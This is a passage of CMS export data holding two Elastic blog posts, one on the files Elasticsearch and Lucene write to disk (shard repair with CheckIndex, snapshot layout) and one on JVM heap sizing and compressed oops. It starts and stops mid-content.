style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50PostingsFormat.html\"\u003eFrequencies\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.doc \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eContains the list of docs which contain each term along with frequency \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"odd\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50PostingsFormat.html\"\u003ePositions\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.pos \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eStores position information about where a term occurs in the index \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"even\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50PostingsFormat.html\"\u003ePayloads\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.pay \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eStores additional per-position metadata information such as character offsets and user payloads \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"odd\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50NormsFormat.html\"\u003eNorms\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.nvd, .nvm \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eEncodes length and boost factors for docs and fields \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"even\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50DocValuesFormat.html\"\u003ePer-Document Values\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.dvd, .dvm \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eEncodes additional scoring factors or other per-document information. \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"odd\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50TermVectorsFormat.html\"\u003eTerm Vector Index\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.tvx \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eStores offset into the document data file \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"even\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50TermVectorsFormat.html\"\u003eTerm Vector Documents\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.tvd \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eContains information about each document that has term vectors \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"odd\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50TermVectorsFormat.html\"\u003eTerm Vector Fields\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.tvf \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eThe field level info about term vectors \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"even\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50LiveDocsFormat.html\"\u003eLive Documents\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.liv \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eInfo about what files are live\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n \u003c/table\u003e\n \u003cp\u003eOften, you’ll also see a segments.gen file in the Lucene index directory, which is a helper file that contains information about the current/latest segments_N file and is used for filesystems that might not return enough information via directory listings to determine the latest generation segments file.\u003c/p\u003e\n \u003cp\u003eIn older Lucene versions you’ll also find files with the .del suffix. These serve the same purpose as the Live Documents (.liv) files – in other words, these are the deletion lists. If you’re wondering what all this talk about Live Documents and deletion lists are about, you might want to read up on it in the section about building indexes in our \u003ca href=\"/blog/found-elasticsearch-from-the-bottom-up/#building-indexes\"\u003eElasticsearch from the bottom-up article\u003c/a\u003e.\u003c/p\u003e\n\u003c/section\u003e\n\u003csection id=\"fixing-problematic-shards\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#fixing-problematic-shards\"\u003eFixing Problematic Shards\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eSince an Elasticsearch shard contains a Lucene Index, we can use Lucene’s wonderful \u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/index/CheckIndex.html\"\u003eCheckIndex tool\u003c/a\u003e, which enables us to scan and fix problematic segments with usually minimal data loss. We would generally recommend Elasticsearch users to simply re-index the data, but if for some reason that’s not possible and the data is very important, it’s a route that’s possible to take, even if it requires quite a bit of manual work and time, depending on the number of shards and their sizes.\u003c/p\u003e\n \u003cblockquote\u003eThe Lucene CheckIndex tool is included in the default Elasticsearch distribution and requires no additional downloads.\u003c/blockquote\u003e\u003cpre class=\"sourceCode bash prettyprint\"\u003e# change this to reflect your shard path, the format is\u003cbr /\u003e# {path.data}/{cluster_name}/nodes/{node_id}/indices/{index_name}/{shard_id}/index/\u003cbr /\u003e\u003cbr /\u003e$ export SHARD_PATH=data/elasticsearch/nodes/0/indices/foo/0/index/\u003cbr /\u003e$ java -cp lib/elasticsearch-*.jar:lib/*:lib/sigar/* -ea:org.apache.lucene... org.apache.lucene.index.CheckIndex $SHARD_PATH\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eIf CheckIndex detects a problem and its suggestion to fix it looks sensible, you can tell CheckIndex to apply the fix(es) by adding the -fix command line parameter.\u003c/p\u003e\n\u003c/section\u003e\n\u003csection id=\"storing-snapshots\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#storing-snapshots\"\u003eStoring Snapshots\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eYou might wonder how all these files translate into the storage used by the \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-snapshots.html\"\u003esnapshot repositories\u003c/a\u003e. Wonder no more: taking this cluster, snapshotting it as my-snapshot to a filesystem based gateway and inspecting the files in the repository we’ll find these files (some files omitted for brevity):\u003c/p\u003e\u003cpre class=\"sourceCode bash prettyprint\"\u003e$ tree -h snapshots\u003cbr /\u003esnapshots\u003cbr /\u003e├── [ 31] index\u003cbr /\u003e├── [ 102] indices\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; └── [ 136] foo\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; ├── [1.2K] 0\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; │\u0026nbsp;\u0026nbsp; ├── [ 350] __0\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; │\u0026nbsp;\u0026nbsp; ├── [1.8K] __1\u003cbr /\u003e...\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; │\u0026nbsp;\u0026nbsp; ├── [ 350] __w\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; │\u0026nbsp;\u0026nbsp; ├── [ 380] __x\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; │\u0026nbsp;\u0026nbsp; └── [8.2K] snapshot-my-snapshot\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; └── [ 249] snapshot-my-snapshot\u003cbr /\u003e├── [ 79] metadata-my-snapshot\u003cbr /\u003e└── [ 171] snapshot-my-snapshot\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eAt the root we have an index file that contains information about all the snapshots in this repository and each snapshot has an associated snapshot- and a metadata- file. The snapshot- file at the root contains information about the state of the snapshot, which indexes it contains and so on. The metadata- file at the root contains the cluster metadata at the time of the snapshot.\u003c/p\u003e\n \u003cblockquote\u003eWhen compress: true is set, metadata- and snapshot- files are compressed using \u003ca href=\"https://github.com/ning/compress\"\u003eLZF\u003c/a\u003e, which focuses on compressing and decompressing speed, which makes it a great fit for Elasticsearch. The data is stored with a header: ZV + 1 byte indicating whether the data is compressed. After the header there will be one or more compressed 64K blocks on the format: 2 byte block length + 2 byte uncompressed size + compressed data. Using this information you can use any \u003ca href=\"http://freecode.com/projects/liblzf\"\u003eLibLZF\u003c/a\u003e compatible decompressor. If you want to learn more about LZF, check out \u003ca href=\"https://github.com/ning/compress/wiki/LZFFormat\"\u003ethis great description\u003c/a\u003e of the format.\u003c/blockquote\u003e\n \u003cp\u003eAt the index level there is another file, indices/{index_name}/snapshot-{snapshot_name} that contains the index metadata, such as settings and mappings for the index at the time of the snapshot.\u003c/p\u003e\n \u003cp\u003eAt the shard level you’ll find two kinds of files: renamed Lucene index files and the shard snapshot file: indices/{index_name}/{shard_id}/snapshot-{snapshot_name}. This file contains information about which of the files in the shard directory are used in the snapshot and a mapping from the logical file names in the snapshot to the concrete filenames they should be stored as on-disk when being restored. It also contains the checksum, Lucene versioning and size information for all relevant files that can be used to detect and prevent data corruption.\u003c/p\u003e\n \u003cblockquote\u003eYou might wonder why these files have been renamed instead of just keeping their original file names, which potentially would have been easier to work with directly on disk. The reason is simple: it’s possible to snapshot an index, delete and re-create it before snapshotting it again. In this case, several files would end up having the same names, but different contents.\u003c/blockquote\u003e\n\u003c/section\u003e\n\u003csection id=\"summary\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#summary\"\u003eSummary\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eIn this article we have looked at the files written to the data directory by various levels of Elasticsearch: the node, index and shard level. We’ve seen where the Lucene indexes are stored on disk, and briefly described how to use the Lucene CheckIndex tool to verify and fix problematic shards.\u003c/p\u003e\n \u003cp\u003eHopefully, you won’t ever need to perform any operations on the contents of the Elasticsearch data directory, but having some insight into what kind of data is written to your file system by your favorite search based database is always a good idea.\u003c/p\u003e\n \u003cp\u003e\u003cem\u003eEditor’s Note (May 1, 2017): Starting with 6.0, any curl command to Elasticsearch containing content will require a valid content type header. As a result, this post has been updated to reflect this change and to set readers of this post up for success with future versions.\u003c/em\u003e\u003cbr /\u003e\u003c/p\u003e\n\u003c/section\u003e","category":[{"uid":"bltb79594af7c5b4199","_version":3,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:05.640Z","created_by":"blt3044324473ef223b70bc674c","key":"product","label_l10n":"Product","tags":[],"title":"Product","updated_at":"2024-05-10T13:44:20.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.527Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T12:58:12.952Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":null,"markdown_l10n":"","product":["elastic cloud"],"publish_date":"2015-05-26T19:02:16.000Z","seo":{"seo_title_l10n":"","seo_description_l10n":"In this article we'll investigate the files written to the data directory by various parts of Elasticsearch. We will look at node, index and shard level files and give a short explanation of their contents in order to establish an understanding of the data written to disk by Elasticsearch.","og_markup":{"facebook_profile_id":""},"canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blte0256e5390d036ed","ACL":{},"created_at":"2023-11-06T20:25:43.573Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-migration","label_l10n":"Cloud migration","tags":[],"title":"Cloud migration","updated_at":"2023-11-06T20:25:43.573Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:27.667Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[],"thumbnail_image":null,"title":"A Dive into the Elasticsearch Storage","title_l10n":"A Dive into the Elasticsearch Storage","updated_at":"2024-09-12T19:54:18.705Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/found-dive-into-elasticsearch-storage","versions":[],"publish_details":{"time":"2024-09-12T19:54:23.382Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt18304c082fc9f803","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blte67be2fcc12d5d96"],"body_l10n":"\u003ctable style=\"background-image: initial;background-position-x: initial;background-position-y: initial;background-size: initial;background-repeat-x: initial;background-repeat-y: initial;background-attachment: initial;background-origin: initial;background-clip: initial;background-color: rgb(255, 255, 210);\"\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eEditor's Note (February 28, 2020):\u003c/strong\u003e This blog has been update to remove references to G1 GC not being recommended. G1 GC support was added in Elasticsearch 6.5. Additionally, this article refers to \u003ca href=\"/what-is/elasticsearch-monitoring\" target=\"_self\"\u003eElastic Stack monitoring\u003c/a\u003e features as Marvel.\u003cbr /\u003e\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003cp\u003eEngineers can \u003ca href=\"https://genius.com/2190774\" target=\"_self\"\u003eresist anything\u003c/a\u003e except giving their processes more resources: bigger, better, faster, more of cycles, cores, RAM, disks and interconnects! When these resources are not a bottleneck, this is wasteful but harmless. For processes like Elasticsearch that run on the JVM, the luring temptation is to turn the heap up; what harm could possibly come from having more heap? Alas, the story isn't simple.\u003c/p\u003e\n\u003cp\u003e\u003cbr /\u003eJava is a \u003ca href=\"https://en.wikipedia.org/wiki/Garbage_collection_(computer_science)\" target=\"_self\"\u003egarbage-collected language\u003c/a\u003e. Java objects reside in a runtime area of memory called \u003cdfn\u003ethe heap\u003c/dfn\u003e. When the heap fills up, objects that are no longer referenced by the application (affectionately known as \u003cdfn\u003egarbage\u003c/dfn\u003e) are automatically released from the heap (such objects are said to have been \u003cdfn\u003ecollected\u003c/dfn\u003e). The maximum size of the heap is specified at application startup and fixed for the life the application; this size impacts allocation speed, garbage collection frequency, and garbage collection duration (most notably the dreaded stop-the-world phase which pauses all application threads). Applications have to strike a balance between small heaps and large heaps; the heap \u003ca href=\"https://en.wikiquote.org/wiki/Wallis,_Duchess_of_Windsor\" target=\"_self\"\u003ecan be too rich or too thin\u003c/a\u003e.\u003cbr /\u003e\u003c/p\u003e\n\u003ch2\u003eToo Small\u003c/h2\u003e\n\u003cp\u003eIf the heap is too small, applications will be prone to the danger of out of memory errors. While that is the most serious risk from an undersized heap, there are additional problems that can arise from a heap that is too small. A heap that is too small relative to the application's allocation rate leads to frequent small latency spikes and reduced throughput from constant garbage collection pauses. Frequent short pauses impact end-user experience as these pauses effectively shift the latency distribution and reduce the number of operations the application can handle. For Elasticsearch, constant short pauses reduce the number of indexing operations and queries per second that can be handled. A small heap also reduces the memory available for indexing buffers, caches, and memory-hungry features like aggregations and suggesters.\u003c/p\u003e\n\u003ch2\u003eToo Large\u003c/h2\u003e\n\u003cp\u003eIf the heap is too large, the application will be prone to infrequent long latency spikes from full-heap garbage collections. Infrequent long pauses impact end-user experience as these pauses increase the tail of the latency distribution; user requests will sometimes see unacceptably-long response times. Long pauses are especially detrimental to a distributed system like Elasticsearch because a long pause is indistinguishable from a node that is unreachable because it is hung, or otherwise isolated from the cluster. During a stop-the-world pause, no Elasticsearch server code is executing: it doesn't call, it doesn't write, and it doesn't send flowers. In the case of an elected master, a long garbage collection pause can cause other nodes to stop following the master and elect a new one. In the case of a data node, a long garbage collection pause can lead to the master removing the node from the cluster and reallocating the paused node's assigned shards. This increases network traffic and disk I/O across the cluster, which hampers normal load. Long garbage collection pauses are a top issue for cluster instability.\u003c/p\u003e\n\u003ch2\u003eJust Right\u003c/h2\u003e\n\u003cp\u003eThe crux of the matter is that undersized heaps are bad, oversized heaps are bad and so it needs to be \u003ca href=\"https://en.wikipedia.org/wiki/Goldilocks_and_the_Three_Bears\" target=\"_self\"\u003ejust right\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003eOops!...I Did It Again\u003c/h2\u003e\n\u003cp\u003e\u003cbr /\u003eThe engineers behind Elasticsearch have long advised keeping the heap size below \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/guide/current/heap-sizing.html\" target=\"_self\"\u003esome threshold near 32 GB\u003c/a\u003e\u003ca href=\"#fn1\" id=\"ref1\" target=\"_self\"\u003e\u003csup\u003e1\u003c/sup\u003e\u003c/a\u003e (some docs referred to a 30.5 GB threshold). The reasoning behind this advice arises from the notion of compressed ordinary object pointers (or \u003cdfn\u003e\u003ca href=\"https://docs.oracle.com/javase/7/docs/technotes/guides/vm/performance-enhancements-7.html#compressedOop\" target=\"_self\"\u003ecompressed oops\u003c/a\u003e\u003c/dfn\u003e).\u003cbr /\u003e\u003c/p\u003e\n\u003cp\u003e\u003cbr /\u003eAn ordinary object pointer (or \u003cdfn\u003eoops\u003c/dfn\u003e) is a managed pointer to an object and it has the same size as a native pointer. This means that on a 32-bit JVM an oop is 32-bits in size and on a 64-bit JVM an oop is 64-bits in size. Comparing an application that runs on a 32-bit JVM to an application that runs on a 64-bit JVM, the former will usually\u003ca href=\"#fn2\" id=\"ref2\" target=\"_self\"\u003e\u003csup\u003e2\u003c/sup\u003e\u003c/a\u003e perform faster. This is because 32-bit pointers require half of the memory space compared to 64-bit pointers; this is friendlier to limited memory bandwidth, precious CPU caches, and leads to fewer garbage collection cycles as there is more room available on the heap.\u003cbr /\u003e\u003c/p\u003e\n\u003cp\u003eApplications that run on a 32-bit JVM are limited to a maximum heap size of slightly less than 4 GB. For modern distributed server applications serving large volumes of data, this is usually too small. But there's a neat trick that can be employed: limit the heap to slightly less than 32 GB and then the JVM can get away with 35-bit oops (since 2\u003csup\u003e35\u003c/sup\u003e = 32 GB). Using thirty-five bits is not friendly to modern CPU architectures, though, so another trick is employed: keep all objects aligned on 8-byte boundaries and then we can assume the last three bits of 35-bit oops are zeros\u003ca href=\"#fn3\" id=\"ref3\" target=\"_self\"\u003e\u003csup\u003e3\u003c/sup\u003e\u003c/a\u003e. Now the JVM can get away with 32-bit object pointers yet still reference 32 GB of heap. These are compressed oops.\u003c/p\u003e\n\u003cp\u003eThen, exactly like the situation with going from a 32-bit JVM to a 64-bit JVM, comparing an application with a heap size just less than the compressed oops threshold to one with a heap size just more than the compressed oops threshold, the latter will perform worse. What is more, the heap useable to the application will be significantly smaller because of the additional space taken up by the 64-bit oops. Increasing the size of the heap to overcome this loss, however, leads to a larger heap that is subject to the long-pause problem already discussed. For Elasticsearch, our advice is to always stay below the compressed oops threshold.\u003c/p\u003e\n\u003ch2\u003eIt's Complicated\u003c/h2\u003e\n\u003cp\u003eIt turns out that the true story is more complicated than this as there are two additional cutoffs.\u003c/p\u003e\n\u003cp\u003eThe first is natural and easy to understand. If the heap is smaller than 4 GB, the JVM can just use 32-bit pointers.\u003c/p\u003e\n\u003cp\u003eThe second cutoff is less obvious. If the heap will not fit in the first 4 GB of address space, the JVM will next try to reserve memory for the heap within the first 32 GB of address space and then use a zero base for the heap; this is known as \u003ca href=\"https://docs.oracle.com/javase/7/docs/technotes/guides/vm/performance-enhancements-7.html#zeroBasedCompressedOop\" target=\"_self\"\u003e\u003cdfn\u003ezero-based compressed oops\u003c/dfn\u003e\u003c/a\u003e. When this reservation can not be granted, the JVM has to fall back to using a non-zero base for the heap. If a zero base can be used, a simple 3-bit shift is all that is needed for encoding and decoding between native 64-bit pointers and compressed oops.\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003enative oop = (compressed oop \u0026lt;\u0026lt; 3)\u003cbr /\u003e\u003c/pre\u003e\n\u003cp\u003eBut when the base is non-zero, a null check is needed and that additional base must be added and subtracted when encoding and decoding compressed oops.\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003eif (compressed oop is null)\u003cbr /\u003e native oop = null\u003cbr /\u003eelse\u003cbr /\u003e native oop = base + (compressed oop \u0026lt;\u0026lt; 3)\u003cbr /\u003e\u003c/pre\u003e\n\u003cp\u003eThis causes a significant drop in performance\u003ca href=\"#fn4\" id=\"ref4\" target=\"_self\"\u003e\u003csup\u003e4\u003c/sup\u003e\u003c/a\u003e. The cutoff for using a zero base varies across operating systems\u003ca href=\"#fn5\" id=\"ref5\" target=\"_self\"\u003e\u003csup\u003e5\u003c/sup\u003e\u003c/a\u003e but 26 GB is a conservative cutoff across a variety of operating systems.\u003c/p\u003e\n\u003ch2\u003eLess is More\u003c/h2\u003e\n\u003cp\u003eWhat frequently happens though is that our advice surrounding compressed oops is interpreted as advice to set the heap as high as it can go while staying under the compressed oops threshold. Instead though, it's better to set the heap as low as possible while satisfying your requirements for indexing and query throughput, end-user query response times, yet large enough to have adequate heap space for indexing buffers, and large consumers of heap space like aggregations, and suggesters. The smaller that you can set the heap, the less likely you'll be subject to detrimental long garbage collection pause, and the more physical memory that will be available for the filesystem cache which continues to be used more and more to great effect by Lucene and Elasticsearch.\u003c/p\u003e\n\u003ch2\u003eStraight Cache Homie\u003c/h2\u003e\n\u003cp\u003eModern operating systems maintain a \u003ca href=\"https://en.wikipedia.org/wiki/Page_cache\" target=\"_self\"\u003efilesystem cache\u003c/a\u003e of pages accessed from disk. This cache only uses free memory and is handled transparently by the operating system. Once a page is read from the file system and placed in the cache, accessing it is as fast as reading from memory. This means that index segments, term dictionaries, and doc values can be accessed as if they are sitting in memory once they've been placed into the cache. What is more, this cache is not managed by the JVM so we get the benefits of blazingly fast memory speeds without the consequences of being on heap. This is why we continue to recommend having as much memory as possible for the filesystem cache.\u003c/p\u003e\n\u003ch2\u003eGarbage First\u003c/h2\u003e\n\u003cp\u003e\u003cbr /\u003eThe JVM engineers have developed a concurrent garbage collector known as \u003ca href=\"https://docs.oracle.com/javase/7/docs/technotes/guides/vm/G1.html\" target=\"_self\"\u003e\u003cdfn\u003eG1 GC\u003c/dfn\u003e\u003c/a\u003e that was first supported starting in JDK 7u4 and is set to be the \u003ca href=\"https://openjdk.java.net/jeps/248\" target=\"_self\"\u003edefault collector starting in JDK 9\u003c/a\u003e\u003ca href=\"#fn6\" id=\"ref6\" target=\"_self\"\u003e\u003csup\u003e6\u003c/sup\u003e\u003c/a\u003e. This collector divides the heap into regions and is designed to first collect regions that are mostly garbage (hence \u003cdfn\u003eG1\u003c/dfn\u003e: garbage first). This collector still pauses application threads when collecting, but the idea is that by focusing on regions with the most garbage, these collections will be highly efficient so that application threads need to be paused only briefly. This enables G1 GC to operate on large heaps with predictable pause times. This is exactly what we want!\u003cbr /\u003e\u003c/p\u003e\n\u003ch2\u003eTogether We Can Prevent Forest Fires\u003c/h2\u003e\n\u003cp\u003eThe Elasticsearch heap \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/setup-configuration.html#setup-configuration\" target=\"_self\"\u003ecan be specified at startup\u003c/a\u003e through the ES_HEAP_SIZE environment variable. The ideal scenario, if you can, is to size your heap below 4 GB. If you have to go above 4 GB, try to stay below the zero-based threshold for your system. You can check if you're under the zero-based threshold by starting Elasticsearch with the JVM options -XX:+UnlockDiagnosticVMOptions -XX:+PrintCompressedOopsMode and looking for output similar to\u003c/p\u003e\u003cpre\u003eheap address: 0x000000011be00000, size: 27648 MB, zero based Compressed Oops\u003cbr /\u003e\u003c/pre\u003e\n\u003cp\u003eshowing that zero-based compressed oops are enabled instead of\u003c/p\u003e\u003cpre\u003eheap address: 0x0000000118400000, size: 28672 MB, Compressed Oops with base: 0x00000001183ff000\u003cbr /\u003e\u003c/pre\u003e\n\u003cp\u003eshowing that zero-based compressed oops are not enabled. If you have to go above the zero-based threshold, stay below the compressed oops threshold. Starting with Elasticsearch 2.2.0, Elasticsearch \u003ca href=\"https://github.com/elastic/elasticsearch/pull/15489\" target=\"_self\"\u003elogs at startup\u003c/a\u003e whether or not it is using compressed oops, and the same information is also available in the \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/cluster-nodes-info.html\" target=\"_self\"\u003enodes info API\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eHere are some points-of-consideration for reducing the need for large heaps:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eReduce the use of \u003ca href=\"https://www.elastic.co/blog/support-in-the-wild-my-biggest-elasticsearch-problem-at-scale\" target=\"_self\"\u003efield data\u003c/a\u003e and take advantage of \u003ca href=\"https://www.elastic.co/blog/disk-based-field-data-a-k-a-doc-values\" target=\"_self\"\u003edoc values\u003c/a\u003e where possible (the default for every possible field starting in Elasticsearch 2.0.0)\u003ca href=\"#fn7\" id=\"ref7\" target=\"_self\"\u003e\u003csup\u003e7\u003c/sup\u003e\u003c/a\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://issues.apache.org/jira/browse/LUCENE-6504\" target=\"_self\"\u003eDisk-based norms\u003c/a\u003e are available starting in Elasticsearch 2.1.0\u003ca href=\"#fn8\" id=\"ref8\" target=\"_self\"\u003e\u003csup\u003e8\u003c/sup\u003e\u003c/a\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://issues.apache.org/jira/browse/LUCENE-6840\" target=\"_self\"\u003eDoc values consume less memory for multi-fields\u003c/a\u003e starting in Elasticsearch 2.2.0.\u003c/li\u003e\n \u003cli\u003eDo not over-shard (some advantages among many: a search request across N shards has to collect results from all N shards so fewer shards means smaller result sets to sift through and better request cache utilization, less terms dictionaries, and fewer shards leads to a smaller cluster state).\u003c/li\u003e\n \u003cli\u003eDo not use overly-large bulk indexing batch sizes (32 MB is okay, 256 MB is probably not).\u003c/li\u003e\n \u003cli\u003eDo not use large bulk indexing queues (to keep the total bytes across all in-flight requests reasonable; \u003ca href=\"https://github.com/elastic/elasticsearch/issues/16011\" target=\"_self\"\u003ea circuit breaker will limit this starting in Elasticsearch 5.0.0\u003c/a\u003e).\u003c/li\u003e\n \u003cli\u003eDo not request too many \u003ca href=\"https://github.com/elastic/elasticsearch/pull/13188\" target=\"_self\"\u003ehits in a single request\u003c/a\u003e, use scrolling instead.\u003c/li\u003e\n \u003cli\u003eDo not request too many aggregation buckets or use deeply-nested aggregations.\u003c/li\u003e\n \u003cli\u003eConsider trading performance for memory and \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/2.3/search-aggregations-bucket-terms-aggregation.html#_collect_mode\" target=\"_self\"\u003euse breadth_first collection mode\u003c/a\u003e for deep aggregations.\u003c/li\u003e\n \u003cli\u003eUse \u003ca href=\"https://www.elastic.co/what-is/elasticsearch-monitoring\" target=\"_self\"\u003eMarvel\u003c/a\u003e to monitor the JVM heap over time.\u003cbr /\u003e\n \u003cfigure\u003e\n \u003cdiv data-img-caption-container=\"true\" style=\"display: inline-block; text-align: center;\"\u003e\u003cimg src=\"https://api.contentstack.io/v2/assets/575e4d4f3dc542cb38c0a3c3/download?uid=blt31774e23baadb736\" /\u003e\n \u003cfigcaption style=\"text-align: center;\"\u003eThis screenshot from Marvel shows a heap that is too small: the garbage collections are barely able to free objects leaving little heap space free after each collection.\u003c/figcaption\u003e\n \u003c/div\u003e\n \u003c/figure\u003e\n \u003cfigure\u003e\n \u003cdiv data-img-caption-container=\"true\" style=\"display: inline-block; text-align: center;\"\u003e\u003cimg src=\"https://api.contentstack.io/v2/assets/575e4d4f9e7a83165490e112/download?uid=bltfcad775c7080079c\" /\u003e\n \u003cfigcaption style=\"text-align: center;\"\u003eThis screenshot from Marvel shows a heap that is too large; the heap is almost exclusively garbage before each collection and this memory is likely better utilized by the filesystem cache.\u003c/figcaption\u003e\n \u003c/div\u003e\n \u003c/figure\u003e\n \u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe engineers behind Lucene and Elasticsearch continue to investigate ways to reduce the need for a large heap. Stay tuned as we push more components of indices off heap, and find ways within Elasticsearch to reduce the dependency on the heap for executing requests.\u003c/p\u003e\n\u003chr /\u003e\n\u003cdiv class=\"footnotes\"\u003e\n \u003col\u003e\n \u003cli id=\"fn1\"\u003eThroughout this post, \u003cdfn\u003eMB\u003c/dfn\u003e and \u003cdfn\u003eGB\u003c/dfn\u003e refer to 2\u003csup\u003e20\u003c/sup\u003e = 1,048,576 and 